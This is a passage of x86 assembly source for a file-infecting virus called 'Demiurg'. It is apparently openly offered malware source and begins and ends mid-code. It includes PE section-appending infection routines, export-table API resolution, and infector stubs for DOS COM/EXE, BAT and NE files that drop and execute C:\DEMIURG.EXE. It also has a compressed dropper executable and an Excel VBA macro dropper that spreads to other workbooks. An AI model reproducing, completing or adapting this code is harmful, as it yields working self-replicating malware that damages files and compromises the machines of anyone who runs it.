filesize], ecx ; filesize=0 mov eax, workspace mapfile: push 0 ; name file mapping obj (shit) push eax ; low dword of filesize push 0 ; high dword of filesize push 4 ; PAGE_READWRITE push 0 ; security attributes (shit) push dword ptr [ebp+offset filehandle] call [ebp+offset CreateFileMappingA] mov [ebp+offset maphandle], eax or eax, eax ; close? JNZ createfilemapping_ok call closefile stc RET createfilemapping_ok: push 0 ; map the whole file push 0 ; low dword of fileoffset push 0 ; high dword of fileoffset push 2 ; read/write access push dword ptr [ebp+offset maphandle] call [ebp+offset MapViewOfFile] mov [ebp+offset mapbase], eax or eax, eax JNZ mapfile_ok call closemaphandle stc RET mapfile_ok: push eax xchg edi, eax add edi, [ebp+offset filesize] xor eax, eax mov ecx, workspace rep stosb pop eax clc RET closemap: push dword ptr [ebp+offset mapbase] call [ebp+offset UnmapViewOfFile] closemaphandle: push dword ptr [ebp+offset maphandle] call [ebp+offset CloseHandle] push 0 ; move relative to start of file push 0 ; high word pointer of file offset push dword ptr [ebp+offset filesize] push dword ptr [ebp+offset filehandle] call [ebp+offset SetFilePointer] push dword ptr [ebp+offset filehandle] call [ebp+offset SetEndOfFile] closefile: lea eax, [ebp+offset LastWriteTime] push eax sub eax, 8 push eax sub eax, 8 push eax push dword ptr [ebp+offset filehandle] call [ebp+offset SetFileTime] push dword ptr [ebp+offset filehandle] call [ebp+offset CloseHandle] push dword ptr [ebp+offset attributes] push dword ptr [ebp+offset filename_ofs] call [ebp+offset SetFileAttributesA] RET ; ----- MODIFY PE FILE LAST SECTION/IMAGESIZE FOR INFECTION ----------------- append_PE: movzx ecx, word ptr [ebx+6] ; ECX=number of sections dec ecx ; ECX=number of last section push ebx ; save PE header offset movzx edx, word ptr [ebx+14h] ; EDX=size of optional header add ebx, edx ; add size of optional header add ebx, 18h ; add size of file header ; EBX=first section header xor edx, edx ; EDX=0 mov eax, 40 ; EAX=size of one sect.header mul ecx ; EAX=size of n-1 sect.headers add ebx, eax ; EBX=last sect.header pointer pop eax ; EAX=PE header pointer or dword ptr [ebx+24h], 0E0000020h ; modify last section flags: ; read, write, exec, code mov ecx, [ebx+8h] ; ECX=VirtualSize of last sect or ecx, ecx ; VirtualSize=0 ? JNZ VirtualSize_OK ; if not, it's ok mov ecx, [ebx+10h] ; if yes, it means that ; VirtualSize=SizeOfRawData VirtualSize_OK: mov edx, ecx ; EDX=last sect. VirtualSize add edx, [ebx+14h] ; add PointerToRawData add edx, [ebp+mapbase] ; add start of memmap mov [ebp+offset virus_start], edx ; save start of virus in map mov edx, ecx ; EDX=VirtualSize add edx, [ebx+0Ch] ; add VirtualAddress mov [ebp+offset virus_RVA], edx ; save virus RVA add ecx, virus_size ; ECX=new section size push ecx ; save it mov [ebx+8h], ecx ; set it as new VirtualSize mov edx, [eax+3Ch] ; EDX=filealign call align_ECX ; align physical sect. size mov [ebx+10h], ecx ; save it as new SizeOfRawData add ecx, [ebx+14h] ; add PointerToRawData mov [ebp+filesize], ecx ; save it as new file size pop ecx ; ECX=new section size add ecx, [ebx+0Ch] ; ECX=new imagesize mov edx, [eax+38h] ; EDX=SectionAlign call align_ECX ; align the new imagesize mov [eax+50h], ecx ; set it as new image size RET ; ----- MOVE VIRUS BODY AND RECALCULATE CHECKSUM ---------------------------- finish_PE_infection: lea esi, [ebp+start] ; ESI=start of virus body mov edi, [ebp+virus_start] ; EDI=virus place in victim mov ecx, virus_size ; ECX=size of virus rep movsb ; copy virusbody to filemap add ebx, 58h ; EBX=PE checksum in map cmp dword ptr [ebx], 0 ; checksummed file? JE end_finish_PE_infection ; if not, we are done lea eax, [ebp+offset imagehlp_dll] ; EAX=ptr to "IMAGEHLP.DLL" push eax call [ebp+offset LoadLibraryA] ; load IMAGEHLP.DLL or eax, eax ; EAX=0 means we failed JZ end_finish_PE_infection push ebx ; save pointer to old CRC lea esi, [ebp+offset CheckSumMappedFile] ; get the CheckSumMappedFile call My_GetProcAddress ; API pop ebx ; restore pointer to old CRC JC end_finish_PE_infection mov ecx, [edx+eax] ; ECX=API RVA add eax, ecx ; ECX=API VA push ebx ; old CRC pointer lea ebx, [ebp+dummy_dword] push ebx ; place to store old CRC push dword ptr [ebp+filesize] ; size of file push dword ptr [ebp+mapbase] ; mapbase call eax ; call CheckSumMappedFile end_finish_PE_infection: RET ; ----- GetAPIs ------------------------------------------------------------- ; EAX=Module Base Address ; ECX=Number of APIs ; ESI=pointer to names table ; EDI=pointer to addresses table GetAPIs: get_APIs_loop: push ecx ; save number of APIs push eax ; save module base address push edi ; save pointer to address tbl call My_GetProcAddress ; get RVA of RVA of one API pop edi ; EDI=where to store the RVAs mov ecx, [edx+eax] ; ECX=API RVA add eax, ecx ; EAX=API VA stosd ; store the API VA next_API_loop: inc esi ; go to next byte cmp byte ptr [esi], 0 ; reached end of API name? JNE next_API_loop ; if not, search on inc esi ; ESI=next API name pop eax ; EAX=module base address pop ecx ; ECX=number of APIs left LOOP get_APIs_loop ; get the next API RET ; ----- My_GetProcAddress --------------------------------------------------- ; input: ; EAX=module base address ; ESI=API function name ; output: ; EDX=RVA of RVA of API function My_GetProcAddress: mov ebx, eax ; EBX=module base address add ebx, [eax+3Ch] ; EBX=new exe header mov ebx, [ebx+78h] ; EBX=export directory RVA add ebx, eax ; EBX=export directory VA xor ecx, ecx ; ECX=0 (counter) mov edx, [ebx+18h] ; EDX=NumberOfNames mov edi, [ebx+20h] ; EDI=AddressOfNames array RVA add edi, eax ; EDI=AddressOfNames array VA search_loop: pusha ; save all registers mov edi, [edi+ecx*4] ; EDI=RVA of current API name add edi, eax ; EDI=VA of current API name cmp_loop: lodsb ; get a byte from our API name cmp byte ptr [edi], al ; is this byte equal? JNE search_on_API ; if not, this isn't our API inc edi ; compare next byte or al, al ; reached end of API name ? JNE cmp_loop ; if not, go on with compare JMP found_API ; if yes, we found our API! search_on_API: popa ; restore all registers inc ecx ; try the next exported API cmp ecx, edx ; end of exported APIs? JL search_loop ; if yes, try the next one API_not_found: popa ; restore all regisers stc ; indicate error with carry RET found_API: popa ; restore all registers mov edx, [ebx+24h] ; EDX=AddressOfOrdinals RVA add edx, eax ; EDX=AddressOfOrdinals VA movzx ecx, word ptr [edx+ecx*2] ; ECX=our API's ordinal mov edx, [ebx+1Ch] ; EDX=AddressOfFunctions RVA lea edx, [edx+ecx*4] ; EDX=RVA of RVA of API clc ; successful, clear carry RET ; ----- aligns ECX to EDX --------------------------------------------------- align_ECX: push ebx ; save EBX xchg eax, ecx ; EAX=value to be aligned mov ebx, edx ; EBX=alignment factor xor edx, edx ; zero out high dword div ebx ; divide or edx, edx ; remainer zero? JZ no_round_up ; if so, don't round up inc eax ; round up no_round_up: mul ebx ; multiply again xchg eax, ecx ; ECX=aligned value mov edx, ebx ; EDX=alignment factor pop ebx ; restore EBX RET ; ----- DECOMPRESS ---------------------------------------------------------- ; ESI : Source buffer offset ; EDI : Destination buffer offset ; EBX : size compressed data decompress: add ebx, esi ; EBX=pointer to end of ; compressed data cld ; clear direction flag loop_head: lodsb ; get a byte from compr. data cmp al, 'æ' ; is it our special byte? JNE store ; if not, just treat it normal xor eax, eax ; EAX=0 lodsb ; EAX=number of repetitions xchg eax, ecx ; ECX=number of repetitions lodsb ; AL=byte to store repetively rep stosb ; store the byte repetively JMP go_on ; go on with the next byte store: stosb ; simply store the byte go_on: cmp ebx, esi ; reached the end? JA loop_head ; if not, just decompress on RET ; ----- CREATES THE PE DROPPER ---------------------------------------------- ; input: ; EDI-where to put the dropper create_dropper: pusha ; save all registers mov dword ptr [ebp+orig_eip], 401060h ; set EntryRVA for dummy PE mov dword ptr [ebp+imagebase], 400000h ; set ImageBase for dummy PE mov ebx, dummy_PE_size ; EBX=size of dummy PE file lea esi, [ebp+offset dummy_PE] ; ESI=pointer to compressed ; PE file dropper call decompress ; decompress it lea esi, [ebp+start] ; ESI=start of virus body mov ecx, virus_size ; ECX=size of virus body cld ; clear direction flag rep movsb ; copy virus body popa ; restore all registers RET ; ----- compressed new header for COM->EXE conversion ----------------------- new_mz_header: db 04Dh, 05Ah, 0E6h, 006h, 000h, 002h, 000h, 001h db 000h, 0FFh, 0FFh, 0F0h, 0FFh, 0FEh, 0FFh, 000h db 000h, 000h, 001h, 0F0h, 0FFh, 0E6h, 008h, 000h new_mz_header_size EQU ($ - new_mz_header) ; ----- code that will be added to dos exe/com files ------------------------ ; ; .286 ; .model tiny ; .code ; org 100h ; start: ; pusha ; save all registers ; push ds ; save segment registers ; push es ; ; call next ; get delta offset ; next: ; pop bp ; sub bp, offset next ; ; mov ax, ds ; AX=PSP segment ; dec ax ; AX=MCB segment ; mov ds, ax ; DS=MCB segment ; mov bx, ds:[3] ; BX=MCB size (in paragraphs) ; sub bx, 0E00h ; shrink MCB for 0E00h bytes ; ; mov ah, 4Ah ; resize MCB in ES to BX paragraphs ; int 21h ; we need to free RAM if we want to ; ; execute another program, even if ; ; it is for Windows ; ; push cs ; DS=CS ; pop ds ; ; mov ax, es ; AX=ES=PSP segment ; mov [bp+offset segm], ax ; save in data block ; ; push cs ; ES=CS ; pop es ; ; mov ah, 3Ch ; create file ; xor cx, cx ; CX=0 (attribtes for new file) ; lea dx, [bp+offset filename] ; DS:DX=pointer to filename ; int 21h ; ; xchg bx, ax ; handle to BX ; ; mov ah, 40h ; write to file ; mov cx, dropper_size ; write the whole dropper ; lea dx, [bp+offset dropper] ; DS:DX=pointer to write buffer ; int 21h ; ; mov ah, 3Eh ; close file ; int 21h ; ; execute: ; mov ax, 4B00h ; execute file ; lea bx, [bp+offset parameter] ; ES:BX=pointer to parameter block ; lea dx, [bp+offset filename] ; DS:DX=pointer to filename ; int 21h ; ; pop es ; restore segment registers ; pop ds ; ; mov ax, es ; AX=PSP segment ; add ax, 10h ; AX=start segment of program image ; add [bp+relo_CS], ax ; relocate old segment values ; add [bp+relo_SS], ax ; ; popa ; restore all registers ; ; db 68h ; push imm16 ; relo_SS dw ? ; ; cli ; pop ss ; set host SS ; db 0BCh ; mov sp, imm16 ; SP_start dw ? ; sti ; ; db 0EAh ; jmp far imm32 ; IP_start dw ? ; relo_CS dw ? ; ; ; filename db "C:\DEMIURG.EXE", 0 ; ; parameter: ; dw 0 ; same enviroment as caller ; dw 80h ; segm dw 0 ; dw 4 dup(0FFFFh) ; FCB addresses (nothing) ; ; dropper: ; ; end start dos_virus_code: db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Dh, 081h db 0EDh, 006h, 001h, 08Ch, 0D8h, 048h, 08Eh, 0D8h db 08Bh, 01Eh, 003h, 000h, 081h, 0EBh, 000h, 00Eh db 0B4h, 04Ah, 0CDh, 021h, 00Eh, 01Fh, 08Ch, 0C0h db 089h, 086h, 07Eh, 001h, 00Eh, 007h, 0B4h, 03Ch db 033h, 0C9h, 08Dh, 096h, 06Bh, 001h, 0CDh, 021h db 093h, 0B4h, 040h, 0B9h dw dropper_size db 08Dh, 096h db 088h, 001h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h db 0B8h, 000h, 04Bh, 08Dh, 09Eh, 07Ah, 001h, 08Dh db 096h, 06Bh, 001h, 0CDh, 021h, 007h, 01Fh, 08Ch db 0C0h, 005h, 010h, 000h, 001h, 086h, 069h, 001h db 001h, 086h, 05Eh, 001h, 061h, 068h relo_SS dw ? db 0FAh, 017h, 0BCh SP_start dw ? db 0FBh, 0EAh IP_start dw ? relo_CS dw ? db 043h, 03Ah, 05Ch, 044h, 045h db 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h, 058h db 045h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh, 0FFh size_dos_virus_code EQU ($ - dos_virus_code) ; ----- code that will be added to BAT files -------------------------------- ; ; This is the BAT code that is appended at the end of infected BAT files. As ; you see, it ECHOes out a COM file and executes it. Then the COM file reads ; the PE dropper that is stored as a kind of internal overlay at the end of ; the BAT file, writes it to disk and executes it. Here is the ASM source of ; the COM loader first: ; ; .286 ; .model tiny ; .code ; org 100h ; start: ; mov ah, 4Ah ; resize memory block ; mov bx, 2020h ; BX=new MCB size in paragraphs ; int 21h ; ; xor bx, bx ; BX=0 ; mov bl, 80h ; BX=80h (command line in PSP) ; mov si, bx ; SI=BX ; mov bl, [si] ; BX=length of commandline ; mov [si+bx+1], bh ; make command line zero terminated ; ; mov ax, 3D02h ; open file read/write ; lea dx, [si+2] ; DS:DX=pointer to filename(cmdline) ; int 21h ; JNC file_ok ; RET ; quit com file ; ; file_ok: ; xchg bx, ax ; handle to BX ; ; mov ax, 4202h ; set filepointer relative to EOF ; xor cx, cx ; CX=0 ; dec cx ; CX=-1 ; mov dx, ((-dropper_size)-1) ; otherwise we would have a zerobyte ; ; in the COM file ; inc dx ; CX:DX=-dropper_size ; int 21h ; ; mov ah, 3Fh ; read from file ; mov cx, dropper_size - 1 ; read the whole PE dropper ; inc cx ; mov dx, offset buffer ; DS:DX=offset to read buffer ; int 21h ; ; mov ah, not 3Eh ; close file ; not ax ; int 21h ; ; mov ah, not 3Ch ; create file ; not ax ; xor cx, cx ; CX=0 (file attributes) ; mov zero, cl ; make filename zero terminated ; mov dx, offset exefile ; DS:DX=pointer to filename ; int 21h ; JC quit ; ; xchg bx, ax ; handle to BX ; ; mov ah, 40h ; write to file ; mov cx, dropper_size - 1 ; CX=size to write (whole PE drpper) ; inc cx ; mov dx, offset buffer ; DS:DX=pointer to write buffer ; int 21h ; JC quit ; ; mov ah, not 3Eh ; close file ; not ax ; int 21h ; ; xor ax, ax ; AX=0 ; mov ah, 4Bh ; AX=4B00h ; xor bx, bx ; BX=0 (no parameter block) ; mov dx, offset exefile ; DS:DX=pointer to filename ; int 21h ; ; quit: ; mov ah, 4Ch ; quit program ; int 21h ; ; exefile db "C:\demiurg.exe" ; zero db ? ; buffer: ; ; end start bat_virus_code: db "@echo off", 0Dh, 0Ah db "set overlay=%0", 0Dh, 0Ah db "if not exist %overlay% set overlay=%0.BAT", 0Dh, 0Ah db "echo " db 0B4h, 04Ah, 0BBh, 020h, 020h, 0CDh, 021h, 033h db 0DBh, 0B3h, 080h, 08Bh, 0F3h, 08Ah, 01Ch, 088h db 078h, 001h, 0B8h, 002h, 03Dh, 08Dh, 054h, 002h db 0CDh, 021h, 073h, 001h, 0C3h, 093h, 0B8h, 002h db 042h, 033h, 0C9h, 049h, 0BAh dw ((-dropper_size) - 1) db 042h, 0CDh, 021h, 0B4h, 03Fh, 0B9h dw (dropper_size - 1) db 041h db 0BAh, 07Eh, 001h, 0CDh, 021h, 0B4h, 0C1h, 0F7h db 0D0h, 0CDh, 021h, 0B4h, 0C3h, 0F7h, 0D0h, 033h db 0C9h, 088h, 00Eh, 07Dh, 001h, 0BAh, 06Fh, 001h db 0CDh, 021h, 072h, 01Fh, 093h, 0B4h, 040h, 0B9h dw (dropper_size - 1) db 041h, 0BAh, 07Eh, 001h, 0CDh, 021h, 072h, 011h db 0B4h, 0C1h, 0F7h, 0D0h, 0CDh, 021h, 033h, 0C0h db 0B4h, 04Bh, 033h, 0DBh, 0BAh, 06Fh, 001h, 0CDh db 021h, 0B4h, 04Ch, 0CDh, 021h, 043h, 03Ah, 05Ch db 064h, 065h, 06Dh, 069h, 075h, 072h, 067h, 02Eh db 065h, 078h, 065h db ">C:\DEMIURG.EXE" db 0Dh, 0Ah db "C:\DEMIURG.EXE %overlay%", 0Dh, 0Ah db "set overlay=", 0Dh, 0Ah db 1Ah ; end of text file size_bat_virus_code EQU ($ - bat_virus_code) ; ------ Code that will be added to NE files -------------------------------- ; ; .286 ; .model tiny ; .code ; org 100h ; start: ; pusha ; save all registers ; push ds ; save segment registers ; push es ; ; call next ; get delta offset ; next: ; pop si ; add si, (data_block - next) ; ; mov ax, es ; AX=PSP segment ; ; push cs ; DS=CS ; pop ds ; ; push ss ; ES=SS ; pop es ; cld ; clear direction flag ; mov cx, data_size ; CX=size of our data ; sub sp, (data_size+512) ; allocate buffer on stack ; mov bp, sp ; BP=stack frame ; mov di, bp ; DI=our buffer on stack ; rep movsb ; copy data block to stackbuf ; ; push ss ; DS=ES=SS ; push ss ; pop es ; pop ds ; ; mov [bp+4], ax ; set PSP segm in paramblock ; ; mov ax, 3D02h ; open file read/write ; lea dx, [bp+our_filename-data_block] ; DS:DX=filename of our host ; int 21h ; JC exit ; ; xchg bx, ax ; handle to BX ; ; mov ax, 4202h ; set filepointer relative ; ; to the end of the file ; mov cx, -1 ; CX:DX=-dropper_size ; mov dx, -dropper_size ; int 21h ; ; mov [bp+source_handle-data_block], bx ; save filehandle ; ; mov ah, 3Ch ; create file ; xor cx, cx ; CX=0 (file attributes) ; lea dx, [bp+(filename-data_block)] ; DS:DX=pointer to PE dropper ; ; filename ("C:\demiurg.exe") ; int 21h ; JC close_source ; ; mov [bp+dest_handle-data_block], ax ; save filehandle ; ; mov cx, (dropper_size / 512) ; CX=size of dropper in ; ; 512 byte blocks ; ; rw_loop: ; push cx ; save number of blocks left ; ; mov ah, 3Fh ; read from file ; mov bx, [bp+source_handle-data_block] ; BX=source handle ; mov cx, 512 ; CX=size to read ; lea dx, [bp+(buffer-data_block)] ; DS:DX=pointer to read buf ; int 21h ; ; mov ah, 40h ; write to file ; mov bx, [bp+dest_handle-data_block] ; BX=destination handle ; mov cx, 512 ; CX=size to write ; lea dx, [bp+(buffer-data_block)] ; DS:DX=pointer to write buf ; int 21h ; ; pop cx ; CX=number of blocks left ; LOOP rw_loop ; ; mov ah, 3Eh ; close source file ; mov bx, [bp+source_handle-data_block] ; int 21h ; ; mov ah, 3Eh ; close destination file ; mov bx, [bp+dest_handle-data_block] ; int 21h ; ; mov ax, 4B00h ; execute dropper file ; mov bx, bp ; ES:BX=parameter block ; lea dx, [bx+18] ; DS:DX=filename ; int 21h ; ; JMP exit ; ; close_source: ; mov ah, 3Eh ; close file ; mov bx, [bp+source_handle-data_block] ; int 21h ; ; exit: ; add sp, (data_size+512) ; remove stack buffer ; ; pop es ; restore segment registers ; pop ds ; popa ; restore all registers ; ; db 68h ; push imm16 ; NE_ip dw 0 ; db 0C3h ; ret near ; ; data_block dw 0 ; same enviroment as caller ; dw 80h ; parameter string offset ; segm dw 0 ; dw 4 dup(0) ; ; source_handle dw 0 ; dest_handle dw 0 ; filename db "C:\DEMIURG.EXE", 0 ; our_filename db 13 dup(0) ; data_size = $ - data_block ; buffer: ; ; end start NE_virus_code: db 060h, 01Eh, 006h, 0E8h, 000h, 000h, 05Eh, 081h db 0C6h, 094h, 000h, 08Ch, 0C0h, 00Eh, 01Fh, 016h db 007h, 0FCh, 0B9h, 02Eh, 000h, 081h, 0ECh, 02Eh db 002h, 08Bh, 0ECh, 08Bh, 0FDh, 0F3h, 0A4h, 016h db 016h, 007h, 01Fh, 089h, 046h, 004h, 0B8h, 002h db 03Dh, 08Dh, 056h, 021h, 0CDh, 021h, 072h, 05Fh db 093h, 0B8h, 002h, 042h, 0B9h, 0FFh, 0FFh, 0BAh dw -dropper_size db 0CDh, 021h, 089h, 05Eh, 00Eh, 0B4h db 03Ch, 033h, 0C9h, 08Dh, 056h, 012h, 0CDh, 021h db 072h, 03Eh, 089h, 046h, 010h, 0B9h dw (dropper_size/512) db 051h, 0B4h, 03Fh, 08Bh, 05Eh, 00Eh, 0B9h, 000h db 002h, 08Dh, 056h, 02Eh, 0CDh, 021h, 0B4h, 040h db 08Bh, 05Eh, 010h, 0B9h, 000h, 002h, 08Dh, 056h db 02Eh, 0CDh, 021h, 059h, 0E2h, 0E2h, 0B4h, 03Eh db 08Bh, 05Eh, 00Eh, 0CDh, 021h, 0B4h, 03Eh, 08Bh db 05Eh, 010h, 0CDh, 021h, 0B8h, 000h, 04Bh, 08Bh db 0DDh, 08Dh, 057h, 012h, 0CDh, 021h, 0EBh, 007h db 0B4h, 03Eh, 08Bh, 05Eh, 00Eh, 0CDh, 021h, 081h db 0C4h, 02Eh, 002h, 007h, 01Fh, 061h, 068h NE_start_IP dw 0 db 0C3h, 000h, 000h, 080h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 043h, 03Ah, 05Ch, 044h db 045h, 04Dh, 049h, 055h, 052h, 047h, 02Eh, 045h db 058h, 045h, 000h our_filename db 13 dup(0) size_NE_virus_code EQU ($ - NE_virus_code) ; ------ dropper code ------------------------------------------------------- ; ; This is a dummy PE file that is as small as possible (under 1KB) and just ; calls ExitProcess. It has been infected with the virus, then the virus body ; was removed, then compressed and converted to DB instructions. This means ; that all we have to do to recreate a working dropper is to expand it and ; add the virus body (see procedure create_dropper) dummy_PE: db 04Dh, 05Ah, 040h, 000h, 001h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 001h, 0E6h, 005h, 000h db 042h, 04Ah, 000h, 000h, 0F0h, 0FFh, 040h, 0E6h db 023h, 000h, 040h, 000h, 000h, 000h, 050h, 045h db 000h, 000h, 04Ch, 001h, 001h, 0E6h, 00Dh, 000h db 0E0h, 000h, 08Eh, 081h, 00Bh, 001h, 0E6h, 00Eh db 000h, 068h, 010h, 0E6h, 00Ch, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 001h, 0E6h, 007h, 000h, 003h, 000h, 00Ah, 0E6h db 006h, 000h, 060h, 000h, 000h, 000h, 002h, 0E6h db 006h, 000h, 002h, 0E6h, 005h, 000h, 010h, 000h db 000h, 020h, 0E6h, 004h, 000h, 010h, 000h, 000h db 010h, 0E6h, 006h, 000h, 010h, 0E6h, 00Ch, 000h db 010h, 000h, 000h, 054h, 0E6h, 073h, 000h, 02Eh db 064h, 065h, 06Dh, 069h, 075h, 072h, 067h, 000h db 050h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 042h, 000h, 000h, 000h, 002h, 0E6h, 00Eh, 000h db 060h, 000h, 000h, 0E0h, 0E6h, 0A0h, 000h, 028h db 010h, 0E6h, 00Ah, 000h, 038h, 010h, 000h, 000h db 030h, 010h, 0E6h, 016h, 000h, 046h, 010h, 0E6h db 006h, 000h, 046h, 010h, 0E6h, 006h, 000h, 04Bh db 045h, 052h, 04Eh, 045h, 04Ch, 033h, 032h, 02Eh db 064h, 06Ch, 06Ch, 0E6h, 004h, 000h, 045h, 078h db 069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h db 073h, 0E6h, 00Dh, 000h, 06Ah, 000h, 0FFh, 015h db 030h, 010h, 040h, 000h dummy_PE_size EQU ($ - dummy_PE) dropper_size EQU 17408 ; ----- macro dropper code -------------------------------------------------- ; ; This is a (compressed) .xls file that will be stored in the xlstart ; directory of excel. It contains the macro code that will stay resident in ; Excel and infects other .xls files: ; ; Attribute VB_Name = "Demiurg" ; Sub Auto_Open() ; Application.OnSheetActivate = "Infect" ; End Sub ; Sub Infect() ; Application.DisplayAlerts = False ; ; lastchar = Asc(Mid$(ActiveWorkbook.Name, Len(ActiveWorkbook.Name), 1)) ; If Asc("1") <= lastchar And lastchar <= Asc("9") Then Exit Sub ; ; For i = 1 To ActiveWorkbook.VBProject.VBComponents.count ; If ActiveWorkbook.VBProject.VBComponents(i).Name = "Demiurg" Then Exit Sub ; Next i ; ; ActiveWorkbook.VBProject.VBComponents.Import ("C:\demiurg.sys") ; ActiveWorkbook.Save ; End Sub macro_dropper: db 0D0h, 0CFh, 011h, 0E0h, 0A1h, 0B1h, 01Ah, 0E1h db 0E6h, 010h, 000h, 03Eh, 000h, 003h, 000h, 0FEh db 0FFh, 009h, 000h, 006h, 0E6h, 00Bh, 000h, 001h db 000h, 000h, 000h, 001h, 0E6h, 008h, 000h, 010h db 000h, 000h, 002h, 000h, 000h, 000h, 002h, 000h db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0E6h, 008h db 000h, 0E6h, 0FFh, 0FFh, 0E6h, 0B1h, 0FFh, 0FDh db 0FFh, 0FFh, 0FFh, 009h, 000h, 000h, 000h, 013h db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 005h db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 007h db 000h, 000h, 000h, 008h, 000h, 000h, 000h, 00Ah db 000h, 000h, 000h, 019h, 000h, 000h, 000h, 00Bh db 000h, 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh db 000h, 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh db 000h, 000h, 000h, 010h, 000h, 000h, 000h, 011h db 000h, 000h, 000h, 012h, 000h, 000h, 000h, 014h db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 015h db 000h, 000h, 000h, 016h, 000h, 000h, 000h, 017h db 000h, 000h, 000h, 018h, 000h, 000h, 000h, 01Ah db 000h, 000h, 000h, 01Dh, 000h, 000h, 000h, 01Bh db 000h, 000h, 000h, 01Ch, 000h, 000h, 000h, 01Eh db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0FEh db 0E6h, 0FFh, 0FFh, 0E6h, 088h, 0FFh, 052h, 000h db 06Fh, 000h, 06Fh, 000h, 074h, 000h, 020h, 000h db 045h, 000h, 06Eh, 000h, 074h, 000h, 072h, 000h db 079h, 0E6h, 02Dh, 000h, 016h, 000h, 005h, 000h db 0E6h, 008h, 0FFh, 002h, 000h, 000h, 000h, 020h db 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h, 006h db 000h, 046h, 0E6h, 004h, 000h, 040h, 026h, 06Ch db 034h, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch db 04Ah, 03Fh, 085h, 0BFh, 001h, 003h, 000h, 000h db 000h, 080h, 02Eh, 0E6h, 006h, 000h, 057h, 000h db 06Fh, 000h, 072h, 000h, 06Bh, 000h, 062h, 000h db 06Fh, 000h, 06Fh, 000h, 06Bh, 0E6h, 031h, 000h db 012h, 000h, 002h, 001h, 00Dh, 000h, 000h, 000h db 0E6h, 008h, 0FFh, 0E6h, 028h, 000h, 092h, 00Ah db 0E6h, 006h, 000h, 05Fh, 000h, 056h, 000h, 042h db 000h, 041h, 000h, 05Fh, 000h, 050h, 000h, 052h db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h db 000h, 054h, 000h, 05Fh, 000h, 043h, 000h, 055h db 000h, 052h, 0E6h, 021h, 000h, 022h, 000h, 001h db 001h, 001h, 000h, 000h, 000h, 00Bh, 000h, 000h db 000h, 00Ah, 0E6h, 017h, 000h, 0A0h, 03Ch, 035h db 04Ah, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch db 04Ah, 03Fh, 085h, 0BFh, 001h, 0E6h, 00Ch, 000h db 056h, 000h, 042h, 000h, 041h, 0E6h, 03Bh, 000h db 008h, 000h, 001h, 000h, 0E6h, 008h, 0FFh, 005h db 0E6h, 017h, 000h, 0A0h, 03Ch, 035h, 04Ah, 03Fh db 085h, 0BFh, 001h, 0A0h, 03Ch, 035h, 04Ah, 03Fh db 085h, 0BFh, 001h, 0E6h, 00Ch, 000h, 001h, 000h db 000h, 000h, 002h, 000h, 000h, 000h, 003h, 000h db 000h, 000h, 004h, 000h, 000h, 000h, 005h, 000h db 000h, 000h, 006h, 000h, 000h, 000h, 007h, 000h db 000h, 000h, 008h, 000h, 000h, 000h, 009h, 000h db 000h, 000h, 00Ah, 000h, 000h, 000h, 00Bh, 000h db 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh, 000h db 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh, 000h db 000h, 000h, 010h, 000h, 000h, 000h, 011h, 000h db 000h, 000h, 012h, 000h, 000h, 000h, 013h, 000h db 000h, 000h, 014h, 000h, 000h, 000h, 015h, 000h db 000h, 000h, 016h, 000h, 000h, 000h, 017h, 000h db 000h, 000h, 018h, 000h, 000h, 000h, 019h, 000h db 000h, 000h, 01Ah, 000h, 000h, 000h, 01Bh, 000h db 000h, 000h, 01Ch, 000h, 000h, 000h, 01Dh, 000h db 000h, 000h, 01Eh, 000h, 000h, 000h, 01Fh, 000h db 000h, 000h, 020h, 000h, 000h, 000h, 021h, 000h db 000h, 000h, 022h, 000h, 000h, 000h, 023h, 000h db 000h, 000h, 024h, 000h, 000h, 000h, 025h, 000h db 000h, 000h, 026h, 000h, 000h, 000h, 027h, 000h db 000h, 000h, 028h, 000h, 000h, 000h, 029h, 000h db 000h, 000h, 02Ah, 000h, 000h, 000h, 0FEh, 0FFh db 0FFh, 0FFh, 02Ch, 000h, 000h, 000h, 02Dh, 000h db 000h, 000h, 02Eh, 000h, 000h, 000h, 02Fh, 000h db 000h, 000h, 030h, 000h, 000h, 000h, 031h, 000h db 000h, 000h, 032h, 000h, 000h, 000h, 033h, 000h db 000h, 000h, 034h, 000h, 000h, 000h, 035h, 000h db 000h, 000h, 036h, 000h, 000h, 000h, 037h, 000h db 000h, 000h, 038h, 000h, 000h, 000h, 039h, 000h db 000h, 000h, 03Ah, 000h, 000h, 000h, 0FEh, 0FFh db 0FFh, 0FFh, 03Ch, 000h, 000h, 000h, 03Dh, 000h db 000h, 000h, 03Eh, 000h, 000h, 000h, 03Fh, 000h db 000h, 000h, 040h, 000h, 000h, 000h, 041h, 000h db 000h, 000h, 042h, 000h, 000h, 000h, 043h, 000h db 000h, 000h, 044h, 000h, 000h, 000h, 045h, 000h db 000h, 000h, 046h, 000h, 000h, 000h, 047h, 000h db 000h, 000h, 048h, 000h, 000h, 000h, 049h, 000h db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 04Bh, 000h db 000h, 000h, 04Ch, 000h, 000h, 000h, 04Dh, 000h db 000h, 000h, 04Eh, 000h, 000h, 000h, 04Fh, 000h db 000h, 000h, 050h, 000h, 000h, 000h, 051h, 000h db 000h, 000h, 052h, 000h, 000h, 